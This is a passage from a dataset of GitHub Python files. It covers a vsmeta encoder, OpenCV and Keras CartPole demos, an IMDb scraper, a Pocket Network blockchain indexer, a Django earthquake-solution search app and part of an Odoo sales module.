vsmeta format \n\n VSMETA is appliable in Synology Video Station\n '''\n bs = bitstring.BitStream()\n\n # Header\n bs.append(self.TAG_FILE_HEADER_MOVIE)\n\n # Main Title\n bs.append(self.TAG_SHOW_TITLE)\n bs.append(str2bytes(trim(video.get(\"designatio\"), 255)))\n bs.append(self.TAG_SHOW_TITLE2)\n bs.append(str2bytes(trim(video.get(\"title\"), 255)))\n\n # Title\n bs.append(self.TAG_EPISODE_TITLE)\n bs.append(str2bytes(trim(video.get(\"title\"), 255)))\n\n # Date\n bs.append(self.TAG_YEAR)\n if len(video.get(\"date\")) > 4:\n bs.append(int2bytes(int(video.get(\"date\")[:4])))\n bs.append(self.TAG_EPISODE_RELEASE_DATE)\n bs.append(str2bytes(video.get(\"date\")))\n else:\n bs.append(int2bytes(0))\n\n # Locked (not update from internet)\n bs.append(self.TAG_EPISODE_LOCKED)\n bs.append(b\"\\x01\")\n\n # Summary\n if (len(video.get(\"outline\")) > 0):\n bs.append(self.TAG_CHAPTER_SUMMARY)\n bs.append(str2bytes(video.get(\"outline\")))\n\n # Meta json (null)\n bs.append(self.TAG_EPISODE_META_JSON)\n bs.append(str2bytes(\"null\"))\n\n # Group Info\n info = bitstring.BitStream()\n # Cast\n for actor in video.get(\"cast\"):\n info.append(self.TAG1_CAST)\n info.append(str2bytes(actor))\n # Director\n info.append(self.TAG1_DIRECTOR)\n info.append(str2bytes(video.get(\"director\")))\n # Genre\n for genre in video.get(\"genres\"):\n info.append(self.TAG1_GENRE)\n info.append(str2bytes(genre))\n info.append(self.TAG1_WRITER)\n info.append(str2bytes(video.get(\"maker\")))\n # End of Group\n bs.append(self.TAG_GROUP1)\n bs.append(int2bytes(len(info.bytes)))\n bs.append(info)\n\n # Classification\n if len(video.get(\"mpaa\")) > 0:\n bs.append(self.TAG_CLASSIFICATION)\n bs.append(str2bytes(video.get(\"mpaa\")))\n\n # Rating\n if len(video.get(\"review\")) > 0:\n bs.append(self.TAG_RATING)\n bs.append(int2bytes(int(float(video.get(\"review\")) * 10)))\n\n # Poster (BASE64 + MD5)\n if len(video.get('poster')) > 0:\n bs.append(self.TAG_EPISODE_THUMB_DATA)\n bs.append(b\"\\x01\")\n bs.append(img2bytes(video.get('poster')))\n bs.append(self.TAG_EPISODE_THUMB_MD5)\n bs.append(b\"\\x01\")\n bs.append(str2bytes(hashlib.md5(video.get('poster')).hexdigest()))\n\n # Group Info\n info = bitstring.BitStream()\n # Background (BASE64 + MD5)\n if len(video.get('fanart')) > 0:\n info.append(self.TAG2_BACKDROP_DATA)\n info.append(img2bytes(video.get('fanart')))\n info.append(self.TAG2_BACKDROP_MD5)\n info.append(str2bytes(hashlib.md5(video.get('fanart')).hexdigest()))\n info.append(self.TAG2_TIMESTAMP)\n info.append(int2bytes(int(time.time() // 1000)))\n # End of Group\n bs.append(self.TAG_GROUP2)\n bs.append(b'\\x01')\n bs.append(int2bytes(len(info.bytes)))\n bs.append(info)\n\n return bs.bytes\n","repo_name":"Lqlsoftware/avutil","sub_path":"avutil/encoder/vsmeta.py","file_name":"vsmeta.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"74275908007","text":"# author: xwwwb\n# date: 2022-09-21\n# description: 通道分离和合并\nimport cv2\nimport numpy as np\n\nimg = np.zeros((480, 640, 3), np.uint8)\n\nb, g, r = cv2.split(img)\n\nb[10:100,10:100] = 255\ng[10:100,10:100] = 255\n\nimg2 = cv2.merge((b,g,r))\ncv2.imshow('img', img)\ncv2.imshow('b', 
b)\ncv2.imshow('g',g)\ncv2.imshow('img2',img2)\n\ncv2.waitKey(0)\n","repo_name":"xwwwb/opencv","sub_path":"twelve_channel_split_merge.py","file_name":"twelve_channel_split_merge.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33096190322","text":"from bs4 import BeautifulSoup as soup\r\nfrom urllib.request import urlopen as ureq\r\n\r\nmy_url = 'https://www.imdb.com/search/title/?genres=drama&groups=top_250&sort=user_rating,desc&ref_=adv_prv'\r\n\r\nuClient = ureq(my_url)\r\npage_html = uClient.read()\r\nuClient.close()\r\npage_soup=soup(page_html,\"html.parser\")\r\n\r\ncontainers = page_soup.findAll(\"div\", {\"class\":\"lister-item-content\"})\r\ncontainer=containers[0]\r\n#print(soup.prettify(container))\r\n\r\nfor container1 in containers:\r\n movie_Names=page_soup.find_all('h3', {\"class\":\"lister-item-header\"})\r\n\r\n for movie_Name in movie_Names:\r\n if movie_Name.find('a'):\r\n print(movie_Name.find('a').text)\r\n print(movie_Name.find('span', {\"class\":\"lister-item-year\"}).text)\r\n movie_duration = page_soup.find_all('p', {\"class\": \"text-muted\"}) # .find('span', {\"class\": \"runtime\"}).text\r\n print(movie_duration[0].find('span', {\"class\": \"runtime\"}).text)\r\n #if movie_duration.find('span'):\r\n # print(movie_duration.find_all('span', {\"class\": \"runtime\"}).text)\r\n #print(movie_Name.findAll('div', {\"class\": \"ratings-bar\"}).findAll('div', {\"name\": \"ir\"}).text)\r\n\r\n","repo_name":"ankitalex/WebScrapping","sub_path":"IMDBUsingSoup.py","file_name":"IMDBUsingSoup.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22880713678","text":"#import requests\n\nimport sys\nimport gui\n\n#pip3 install package_name --user\n\n#Get User Input\ndef check_input():\n print(\"checking input...\")\n\n #If user has not quit yet\n while True:\n\n user_input = input(\"Enter \\\"q\\\" or \\\"quit\\\" to exit the program. 
Enter the Stock Symbol you would like to search for: \")\n print(f\"You entered: {user_input.upper()}\")\n\n if user_input == \"q\" or user_input == \"quit\":\n print(\"Exitting program...\")\n sys.exit()\n else:\n print(\"Running the program...\")\n #getdata.get_data(user_input)\n gui.run_gui(user_input)\n\n\n\ncheck_input()\n\n\n\n\n","repo_name":"KC-Dream/python_stocks_api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10072612173","text":"from argparse import ArgumentParser\nfrom functools import partial\nfrom glob import iglob\nfrom multiprocessing import cpu_count, Manager, Pool, Queue\nimport os\nimport re\nfrom typing import Optional\n\nfrom pokt import PoktRPCDataProvider\nfrom pokt.index.ingest import ingest_block_range\n\n\ndef chunks_bounds(start_block: int, end_block: int, batch_size: int):\n return [\n (a, b, batch_size)\n for a, b in zip(\n range(start_block, end_block, batch_size),\n list(range(start_block - 1 + batch_size, end_block, batch_size))\n + [end_block],\n )\n ]\n\n\ntotal_txs = 0\ntotal_blocks = 0\ntotal_errors = 0\n\n\ndef progress_reader(queue):\n global total_blocks, total_errors, total_txs\n while not queue.empty():\n try:\n update = queue.get(timeout=0.05)\n if update[0] == \"txs\":\n total_txs += update[1]\n elif update[0] == \"error\":\n total_errors += 1\n else:\n total_blocks += update[1]\n print(\n \"\\rBlocks: {} Transactions: {} Errors: {} \".format(\n total_blocks, total_txs, total_errors\n ),\n end=\"\",\n flush=True,\n )\n except:\n break\n return True\n\n\ndef ingest_chunk(\n start: int,\n end: int,\n batch_size: int,\n queue: Queue,\n rpc_url: str,\n headers: str,\n txs: str,\n msgs: str,\n):\n global total_errors\n try:\n ingest_block_range(\n start,\n end,\n rpc_url,\n headers,\n txs,\n msgs,\n batch_size=batch_size,\n progress_queue=queue,\n )\n except Exception as e:\n print(\"Error encountered during: {} - {}\".format(start, end))\n print(e)\n total_errors += 1\n return queue\n\n\ndef get_latest_block(url):\n rpc = PoktRPCDataProvider(url)\n return rpc.get_height() - 1\n\n\ndef _get_file_last_block(pq_file):\n match = re.match(r\".*block_[0-9]+-([0-9]+)\\.parquet\", pq_file)\n if match:\n return int(match.group(1))\n return 0\n\n\ndef get_last_indexed(headers_dir, txs_dir):\n headers_pattern = os.path.join(headers_dir, \"*.parquet\")\n txs_pattern = os.path.join(txs_dir, \"*.parquet\")\n try:\n headers_last = max([_get_file_last_block(f) for f in iglob(headers_pattern)])\n except ValueError:\n headers_last = 0\n try:\n txs_last = max([_get_file_last_block(f) for f in iglob(txs_pattern)])\n except ValueError:\n txs_last = 0\n if headers_last != txs_last:\n raise RuntimeError(\"Headers and Transactions don't have matching indexes\")\n return txs_last\n\n\ndef run_indexer(\n start_block: int,\n end_block: int,\n rpc_url: str,\n headers: str,\n txs: str,\n msgs: str,\n batch_size: int = 500,\n n_cores: Optional[int] = None,\n):\n man = Manager()\n progress = man.Queue()\n bounds = chunks_bounds(start_block, end_block, batch_size)\n worker = partial(\n ingest_chunk,\n queue=progress,\n rpc_url=rpc_url,\n headers=headers,\n txs=txs,\n msgs=msgs,\n )\n pool = Pool(n_cores)\n for bound in bounds:\n pool.apply_async(worker, args=bound, callback=progress_reader)\n pool.close()\n pool.join()\n print()\n man.shutdown()\n\n\ndef async_main():\n pass\n\n\ndef main():\n default_base = os.getcwd()\n 
index_default = os.path.join(default_base, \"index\")\n rpc_default = \"http://localhost:8081\"\n parser = ArgumentParser(\n \"pokt-index\", description=\"Index the pocket network blockchain data\"\n )\n parser.add_argument(\n \"-s\",\n \"--start\",\n type=int,\n default=None,\n help=\"The block to start indexing from, defaults to either the first block, or the last indexed block.\",\n )\n parser.add_argument(\n \"-e\",\n \"--end\",\n type=int,\n default=None,\n help=\"The block to index to. Defaults to the latest block.\",\n )\n parser.add_argument(\n \"-j\",\n \"--n-cores\",\n type=int,\n default=None,\n help=\"The number of cores to use when indexing, defaults to 4 less than the total core count.\",\n )\n parser.add_argument(\n \"-u\",\n \"--url\",\n type=str,\n default=rpc_default,\n help=\"The rpc url, defaults to http://localhost:8081.\",\n )\n parser.add_argument(\n \"-d\",\n \"--index-dir\",\n type=str,\n default=index_default,\n help=\"The directory where the indexed files should be written to. Defaults to 'index' of the current working directory.\",\n )\n parser.add_argument(\n \"-b\",\n \"--batch-size\",\n type=int,\n default=250,\n help=\"The number of blocks to write to each parquet file. Defaults to 250.\",\n )\n args = parser.parse_args()\n headers = os.path.join(args.index_dir, \"headers\")\n txs = os.path.join(args.index_dir, \"txs\")\n msgs = os.path.join(args.index_dir, \"tx_msgs\")\n pos = os.path.join(msgs, \"pos\")\n pos_msgs = [\n os.path.join(pos, t)\n for t in (\"MsgStake\", \"MsgBeginUnstake\", \"MsgUnjail\", \"Send\")\n ]\n gov = os.path.join(msgs, \"gov\")\n gov_msgs = [\n os.path.join(gov, t)\n for t in (\"msg_dao_transfer\", \"msg_change_param\", \"msg_upgrade\")\n ]\n apps = os.path.join(msgs, \"apps\")\n apps_msgs = [\n os.path.join(apps, t)\n for t in (\"MsgAppStake\", \"MsgAppUnjail\", \"MsgAppBeginUnstake\")\n ]\n core = os.path.join(msgs, \"pocketcore\")\n core_msgs = [os.path.join(core, t) for t in (\"proof\", \"claim\")]\n dirs = [headers, txs]\n for group in (pos_msgs, gov_msgs, apps_msgs, core_msgs):\n dirs.extend(group)\n for d in dirs:\n if not os.path.exists(d):\n os.makedirs(d)\n start = get_last_indexed(headers, txs) if args.start is None else args.start\n end = get_latest_block(args.url) if args.end is None else args.end\n n_cores = cpu_count() - 4 if args.n_cores is None else args.n_cores\n print(\"Writing batches of {} blocks to {}\".format(args.batch_size, args.index_dir))\n print(\n \"Indexing from block {} to block {} via {} using {} cores\".format(\n start + 1, end, args.url, n_cores\n )\n )\n run_indexer(start + 1, end, args.url, headers, txs, msgs, args.batch_size, n_cores)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pokt-foundation/pypokt","sub_path":"pokt/index/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6397,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"17890465023","text":"import gym\nimport tensorflow\nimport time\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.utils import to_categorical\nimport numpy as np\n\nimport gym\nenv = gym.make(\"CartPole-v1\")\n\nminScoreReq = 30\n\n\ndef makeData(initDataX, initDataY, minScoreReq):\n\toneRunDataX = []\n\toneRunDataY = []\n\tscoreTracker = 0\n\tobservation = env.reset()\n\n\n\tfor _ in range(1000):\n\t env.render()\n\t action = env.action_space.sample() # your agent here (this takes random actions)\n\t oneRunDataX.append(observation)\n\t 
oneRunDataY.append(action)\n\n\t observation, reward, done, info = env.step(action)\n\t scoreTracker = scoreTracker + reward\n\n\t if done:\n\t if(scoreTracker > minScoreReq):\n\t \tinitDataX.append(oneRunDataX)\n\t \tinitDataY.append(oneRunDataY)\n\n\t oneRunDataX = []\n\t oneRunDataY = []\n\t observation = env.reset()\n\t scoreTracker = 0\t\n\n\tenv.close()\n\n\treturn initDataX, initDataY\n\ndef moreData():\n\tobs, act = makeData([], [], minScoreReq)\n\n\tfor i in range(3):\n\t\tobs, act = makeData(obs, act, minScoreReq)\n\t\n\tnp.save(\"feat.npy\", np.array(obs))\n\tnp.save(\"res.npy\", np.array(act))\n\n\treturn obs, act\n\n\n\ndef loadData(file1Name, file2Name):\n\treturn np.load(file1Name), np.load(file2Name)\n\ndef formatData(X):\n\tfinalData = []\n\tfor i in X:\n\t\tfor j in i:\n\t\t\tfinalData.append(j)\n\t\n\treturn np.array(finalData)\n\ndef model():\n\tmodel = Sequential()\n\tmodel.add(Dense(12, input_shape=(4,), activation=\"relu\"))\n\tmodel.add(Dense(8, activation=\"relu\"))\n\tmodel.add(Dense(2, activation=\"sigmoid\"))\n\n\treturn model\n\ndef train(model, X, Y):\n\tmodel.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\n\tmodel.fit(X,Y, epochs=100, batch_size=10)\n\treturn model\n\ndef main():\n\t#moreData()\n\tX, Y = loadData(\"feat.npy\", \"res.npy\")\n\tsetModel = model()\n\tX = formatData(X)\n\tY = formatData(Y)\n\tY = to_categorical(Y)\n\n\n\tprint(X)\n\tprint(Y)\n\n\tfinishedModel = train(setModel, X, Y)\n\n\tfinishedModel.save(\"model1.hdf5\")\n\n\n\ndef testResults(modelPath):\n\tobservation = env.reset()\n\ttrainedModel = model()\n\ttrainedModel.load_weights(modelPath)\n\n\tscoreTracker = 0\n\n\tfor i in range(200):\n\t env.render()\n\t action = trainedModel.predict(np.array([observation]))\n\t action = np.argmax(action)\n\n\t observation, reward, done, info = env.step(action)\n\n\t scoreTracker = scoreTracker + reward\n\t if done:\n\t \tobservation = env.reset()\n\t \tprint(\"Simulation performed with a score of {}\".format(scoreTracker))\n\t \tscoreTracker = 0\n\n\n# main()\ntestResults(\"model1.hdf5\")\n\n\n\n\n\n\n\n\n\n\n","repo_name":"malhotra5/OpenAI-Gym-CartPole-Challenge","sub_path":"FNN/FNN.py","file_name":"FNN.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37083399883","text":"from django.http import HttpResponse, HttpResponseRedirect, FileResponse\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views import generic\nfrom django.db.models import Q\nfrom django.conf import settings\nfrom django.template import Context\nfrom django.template.loader import get_template\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth import logout\nfrom .models import Event, Solution\nfrom .forms import SearchForm\nfrom datetime import datetime\nimport sys, os, tarfile\n\nclass IndexView(generic.ListView):\n template_name = 'wphase/index.html'\n context_object_name = 'latest_event_list'\n\n def get_queryset(self):\n return sorted(Event.objects.all(), key=lambda a: a.date(), reverse=True)[:5]\n\nclass EventView(generic.DetailView):\n model = Event\n template_name = 'wphase/event.html'\n context_object_name = 'event'\n\n def get_context_data(self, **kwargs):\n context = super(EventView, self).get_context_data(**kwargs)\n context[\"solutions\"] = Solution.objects.filter(event=context[\"event\"].eventid)\n return 
context\n\nclass SolutionView(generic.DetailView):\n model = Solution\n template_name = 'wphase/solution.html'\n\nclass SearchView(generic.ListView):\n template_name = 'wphase/search_form.html'\n context_object_name = 'form'\n\n def get_queryset(self):\n return SearchForm()\n\nclass ResultsView(generic.ListView):\n template_name = 'wphase/results.html'\n context_object_name = 's_results'\n\n def get_queryset(self):\n return None\n\n\ndef search(request):\n # if POST : process the form data\n if request.method == 'POST':\n form = SearchForm(request.POST) # \"binding\" data to form\n if form.is_valid():\n latitude_min = form.cleaned_data['latitude_min']\n latitude_max = form.cleaned_data['latitude_max']\n longitude_min = form.cleaned_data['longitude_min']\n longitude_max = form.cleaned_data['longitude_max']\n depth_min = form.cleaned_data['depth_min']\n depth_max = form.cleaned_data['depth_max']\n year_min = form.cleaned_data['year_min']\n month_min = form.cleaned_data['month_min']\n day_min = form.cleaned_data['day_min']\n year_max = form.cleaned_data['year_max']\n month_max = form.cleaned_data['month_max']\n day_max = form.cleaned_data['day_max']\n mw_min = form.cleaned_data['mw_min']\n mw_max = form.cleaned_data['mw_max']\n NPS_min = form.cleaned_data['NPS_min']\n NPS_max = form.cleaned_data['NPS_max']\n NPD_min = form.cleaned_data['NPD_min']\n NPD_max = form.cleaned_data['NPD_max']\n NPR_min = form.cleaned_data['NPR_min']\n NPR_max = form.cleaned_data['NPR_max']\n stations = form.cleaned_data['stations']\n gap_min = form.cleaned_data['gap_min']\n gap_max = form.cleaned_data['gap_max']\n types_solution = form.cleaned_data['types_solution']\n if types_solution == []:\n types_solution = [\"preferred\"]\n output_format = form.cleaned_data['output_format']\n order_solution = form.cleaned_data['order_solution']\n\n # Filter on solution data\n kwargs_s = {}\n if latitude_min and latitude_max:\n kwargs_s['w_latitude__range'] = (latitude_min,latitude_max)\n if longitude_min and longitude_max:\n kwargs_s['w_longitude__range'] = (longitude_min,longitude_max)\n if depth_min and depth_max:\n kwargs_s['w_depth__range'] = (depth_min,depth_max)\n if mw_min and mw_max:\n kwargs_s['w_mw__range'] = (mw_min,mw_max)\n if stations:\n for s in stations:\n kwargs_s['stations__icontains'] = s\n if gap_min and gap_max:\n kwargs_s['gap__range'] = (gap_min,gap_max)\n\n solutions = Solution.objects.filter(**kwargs_s)\n solutions = solutions.filter( (Q(w_np1_strike__range=(NPS_min,NPS_max))&Q(w_np1_dip__range=(NPD_min,NPD_max))&Q(w_np1_rake__range=(NPR_min,NPR_max))) | (Q(w_np2_strike__range=(NPS_min,NPS_max))&Q(w_np2_dip__range=(NPD_min,NPD_max))&Q(w_np2_rake__range=(NPR_min,NPR_max))) )\n\n # Filter on event data\n events = Event.objects.all()\n # Algorithm probably can be improved...\n if year_min and year_max and month_min and month_max and day_min and day_max:\n events = events.filter( (Q(epi_year__gt=year_min)&Q(epi_year__lt=year_max)) | (Q(epi_year=year_min)&Q(epi_month__gt=month_min)&Q(epi_month__lte=12)) | (Q(epi_year=year_min)&Q(epi_month=month_min)&Q(epi_day__gte=day_min)&Q(epi_day__lte=31)) | (Q(epi_year=year_max)&Q(epi_month__gte=1)&Q(epi_month__lt=month_max)) | (Q(epi_year=year_max)&Q(epi_month=month_max)&Q(epi_day__gte=1)&Q(epi_day__lte=day_max)) )\n\n # Crossing filter results\n e_results = []\n s_results = []\n s_ids = []\n for sol in solutions:\n if (sol.event in events):\n ens = Solution.objects.filter(event=sol.event).values_list('status', flat=True)\n if \"preferred\" in types_solution:\n if 
\"xy\" in sol.status:\n s_results.append(sol)\n s_ids.append(sol.id)\n if (sol.event not in e_results):\n e_results.append(sol.event)\n elif \"z\" in sol.status and \"wp_xy\" not in ens:\n s_results.append(sol)\n s_ids.append(sol.id)\n if (sol.event not in e_results):\n e_results.append(sol.event)\n elif \"ts\" in sol.status and \"wp_xy\" not in ens and \"wp_z\" not in ens:\n s_results.append(sol)\n s_ids.append(sol.id)\n if (sol.event not in e_results):\n e_results.append(sol.event)\n elif \"th\" in sol.status and \"wp_xy\" not in ens and \"wp_z\" not in ens and \"wp_ts\" not in ens :\n if sol.status[5:] == min([th[5:] for th in ens.filter(status__contains=\"th\")]):\n s_results.append(sol)\n s_ids.append(sol.id)\n if (sol.event not in e_results):\n e_results.append(sol.event)\n elif \"med\" in sol.status and \"wp_xy\" not in ens and \"wp_z\" not in ens and \"wp_ts\" not in ens and not ens.filter(status__contains=\"th\") :\n s_results.append(sol)\n s_ids.append(sol.id)\n if (sol.event not in e_results):\n e_results.append(sol.event)\n else :\n s_results.append(sol)\n s_ids.append(sol.id)\n if (sol.event not in e_results):\n e_results.append(sol.event)\n\n if output_format == \"std\":\n name_file = sol.event_id + \"_\" + sol.status + \".png\"\n path = \"media/\"+name_file\n if not os.path.isfile(path):\n sol.plot(name_file)\n print (\"Picture was created\")\n \n\n # Sorting results\n if (order_solution == 'time'):\n s_results = sorted(s_results, key=lambda a: a.event.date())\n elif (order_solution == 'rev_time'):\n s_results = sorted(s_results, key=lambda a: a.event.date(), reverse=True)\n elif (order_solution == 'mag'):\n s_results = sorted(s_results, key=lambda a: a.w_mw)\n else: # if order_solution == 'rev_mag'\n s_results = sorted(s_results, key=lambda a: a.w_mw, reverse=True)\n\n request.session[\"types_solution\"] = types_solution\n request.session[\"output_format\"] = output_format\n request.session[\"order_solution\"] = order_solution\n\n # For txt saved file\n request.session[\"sol_ids\"] = '_'.join(map(str,s_ids))\n\n # For results pagination\n paginator = Paginator(s_results, 10) # Show 10 results per page\n page = request.GET.get('page')\n try:\n res = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n res = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 
9999), deliver last page of results.\n res = paginator.page(paginator.num_pages)\n\n return render(request, 'wphase/results.html/', {'s_results':res})\n\n\n # form not valid\n else:\n return render(request, 'wphase/search_form.html',{'error_message': \"Sorry, but the form is not valid.\", 'form':SearchForm()})\n\n # if GET \n else:\n sol_ids = request.session[\"sol_ids\"].split('_')\n sol_ids = map(int, sol_ids)\n s_results = []\n for i in sol_ids:\n s_results.append(Solution.objects.get(pk=i))\n\n # Sorting results\n if (request.session[\"order_solution\"] == 'time'):\n s_results = sorted(s_results, key=lambda a: a.event.date())\n elif (request.session[\"order_solution\"] == 'rev_time'):\n s_results = sorted(s_results, key=lambda a: a.event.date(), reverse=True)\n elif (request.session[\"order_solution\"] == 'mag'):\n s_results = sorted(s_results, key=lambda a: a.w_mw)\n else: # if order_solution == 'rev_mag'\n s_results = sorted(s_results, key=lambda a: a.w_mw, reverse=True)\n\n paginator = Paginator(s_results, 10) # Show 10 results per page\n page = request.GET.get('page')\n try:\n res = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n res = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n res = paginator.page(paginator.num_pages)\n\n return render(request, 'wphase/results.html/', {'s_results':res})\n\n\ndef generate_txt(request, results):\n # Create the HttpResponse object with the appropriate header.\n response = HttpResponse(content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"results.txt\"'\n\n for r in results.split('_'):\n sol = Solution.objects.get(pk=r)\n txt = sol.event.capsule() + \"\\n\"\n txt += \"event name : \" + sol.event.eventid + \"\\n\"\n txt += \"time shift : \" + str(sol.w_time_shift) + \"\\n\"\n txt += \"half duration : \" + str(sol.w_half_duration) + \"\\n\"\n txt += \"latitude : \" + str(sol.w_latitude) + \"\\n\"\n txt += \"longitude : \" + str(sol.w_longitude) + \"\\n\"\n txt += \"depth : \" + str(sol.w_depth) + \"\\n\"\n txt += \"Mrr : \" + str(sol.w_mrr) + \"\\n\"\n txt += \"Mtt : \" + str(sol.w_mtt) + \"\\n\"\n txt += \"Mpp : \" + str(sol.w_mpp) + \"\\n\"\n txt += \"Mrt : \" + str(sol.w_mrt) + \"\\n\"\n txt += \"Mrp : \" + str(sol.w_mrp) + \"\\n\"\n txt += \"Mtp : \" + str(sol.w_mtp) + \"\\n\\n\"\n response.write(txt)\n\n return response\n\ndef generate_targz(request, results):\n # Create and fill tar.gz file\n runs_results = tarfile.open(\"runs_results.tar.gz\", \"w:gz\")\n runs_path = \"/home/lucile/WPHASE/runs\"\n if os.path.isdir(runs_path):\n for run in os.listdir(runs_path):\n run_path = os.path.join(runs_path, run)\n if os.path.isdir(run_path):\n cmt_path = os.path.join(run_path, \"CMTSOLUTION\")\n if os.path.isfile(cmt_path):\n for r in results.split('_'):\n sol = Solution.objects.get(pk=r)\n with open(cmt_path) as cmt :\n if (sol.event.eventid in cmt.readlines()[1].strip()):\n if run not in runs_results :\n #runs_results.add(os.path.join(runs_path, run), arcname=run)\n runs_results.add(os.path.join(run_path, \"i_master\"), arcname=run+\"/i_master\")\n runs_results.add(os.path.join(run_path, \"CMTSOLUTION\"), arcname=run+\"/CMTSOLUTION\")\n if os.path.isfile(os.path.join(run_path, \"wpinversion.ini\")):\n runs_results.add(os.path.join(run_path, \"wpinversion.ini\"), arcname=run+\"/wpinversion.ini\")\n if os.path.isfile(os.path.join(run_path, \"wpinversion_gs.ini\")):\n 
runs_results.add(os.path.join(run_path, \"wpinversion_gs.ini\"), arcname=run+\"/wpinversion_gs.ini\")\n if os.path.isfile(os.path.join(run_path, \"WCMTSOLUTION\")):\n runs_results.add(os.path.join(run_path, \"WCMTSOLUTION\"), arcname=run+\"/WCMTSOLUTION\")\n if os.path.isfile(os.path.join(run_path, \"ts_WCMTSOLUTION\")):\n runs_results.add(os.path.join(run_path, \"ts_WCMTSOLUTION\"), arcname=run+\"/ts_WCMTSOLUTION\")\n if os.path.isfile(os.path.join(run_path, \"xy_WCMTSOLUTION\")):\n runs_results.add(os.path.join(run_path, \"xy_WCMTSOLUTION\"), arcname=run+\"/xy_WCMTSOLUTION\")\n if os.path.isfile(os.path.join(run_path, \"p_wpinversion.ps\")):\n runs_results.add(os.path.join(run_path, \"p_wpinversion.ps\"), arcname=run+\"/p_wpinversion.ps\")\n if os.path.isfile(os.path.join(run_path, \"ts_p_wpinversion.ps\")):\n runs_results.add(os.path.join(run_path, \"ts_p_wpinversion.ps\"), arcname=run+\"/ts_p_wpinversion.ps\")\n if os.path.isfile(os.path.join(run_path, \"xy_p_wpinversion.ps\")):\n runs_results.add(os.path.join(run_path, \"xy_p_wpinversion.ps\"), arcname=run+\"/xy_p_wpinversion.ps\")\n if os.path.isfile(os.path.join(run_path, \"o_wpinversion.ps\")):\n runs_results.add(os.path.join(run_path, \"o_wpinversion\"), arcname=run+\"/o_wpinversion\")\n\n runs_results.close()\n\n # Create response\n response = FileResponse(open('runs_results.tar.gz', 'rb'), content_type=\"application/x-gzip\")\n response['Content-Disposition'] = 'attachment; filename=\"runs_results.tar.gz\"'\n\n return response;\n\ndef my_logout(request):\n logout(request)\n return HttpResponseRedirect('/wphase')\n","repo_name":"eost/wphase_catalog","sub_path":"wphase/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34255806321","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\nimport numpy\n\next_modules = [\n Extension(\"helper\", [\"pfibs/helper.pyx\"])\n]\nsetup(name =\"pfibs\",\n version=\"2018.1.0_0.5\",\n author=\"Jeffery Allen, Justin Chang, Innokentiy Protasov\",\n author_email=\"jallen@nrel.gov\",\n url=\"https://github.com/NREL/pfibs\",\n description=\"pFiBS: parallel FEniCS implementation of Block Solvers\",\n packages=[\"pfibs\",\"pfibs.block_preconditioners\"],\n package_dir={\"pfibs\": \"pfibs\"},\n cmdclass = {'build_ext': build_ext},\n ext_modules = ext_modules,\n include_dirs = [numpy.get_include()]\n)\n","repo_name":"NREL/pfibs","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"71654013289","text":"from odoo import api, fields, models, tools, SUPERUSER_ID, _\nfrom odoo.exceptions import UserError, AccessError, ValidationError\nfrom odoo.tools.safe_eval import safe_eval\nfrom datetime import date, datetime, timedelta\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass SaleRequirementsSaleOrder(models.Model):\n _inherit = 'sale.order'\n\n checklist = fields.Boolean(string=\"Enable Checklist\")\n checklist_progress = fields.Float(string=\"Supplemented\", compute=\"compute_checklist_progress\")\n product_ids = fields.Many2many(string=\"Products in Order Line\", comodel_name=\"product.product\",\n compute=\"populate_product_ids\")\n checklist_ids = fields.Many2many(string=\"Requirements\", 
comodel_name=\"sale.checklist.items\",\n domain=\"['|',('product_ids','in',product_ids),('always_required','=',True)]\")\n\n @api.depends('checklist_ids')\n def compute_checklist_progress(self):\n for record in self:\n total_len = self.env['sale.checklist.items'].search_count([])\n cl_len = len(record.checklist_ids)\n if total_len != 0:\n record.checklist_progress = (cl_len * 100) / total_len\n\n @api.depends('order_line')\n def populate_product_ids(self):\n for rec in self:\n product_list = []\n for order_line in rec.order_line:\n if order_line.product_id.membership:\n product_list.append(order_line.product_id.id)\n rec.product_ids = [(6, 0, product_list)]\n\n @api.multi\n def action_confirm(self):\n res = super(SaleRequirementsSaleOrder, self).action_confirm()\n if self.checklist:\n if self.checklist_progress == 100:\n return res\n else:\n raise UserError(_('Insufficient Supplemented Requirements'))\n return res\n\nclass SaleRequirementsSaleChecklistItems(models.Model):\n _name = 'sale.checklist.items'\n\n name = fields.Char(string=\"Item\", required=True)\n description = fields.Text(string=\"Description\")\n always_required = fields.Boolean(string=\"Always Required\", default=True)\n product_ids = fields.Many2many(string=\"Membership where this is Required\", comodel_name=\"product.product\",\n 